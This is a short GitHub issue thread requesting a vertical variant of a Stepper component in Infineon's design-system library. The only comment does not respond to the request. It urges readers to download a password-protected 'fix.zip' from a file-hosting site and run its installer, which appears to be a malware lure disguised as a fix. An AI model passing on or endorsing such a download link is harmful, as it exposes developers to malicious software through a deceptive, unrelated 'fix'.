### ISSUE TITLE
Stepper: implement a vertical variant

### ISSUE THREAD

**Issue by tishoyanchev** [Infineon/infineon-design-system-stencil#1433]
Implement a vertical variant of the Stepper component following the design requirements: 
https://www.figma.com/design/zPvPwPgb4EsYFXKC2nhzSG/Infineon-DDS-%7C-Main?node-id=17858-11227&m=dev

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
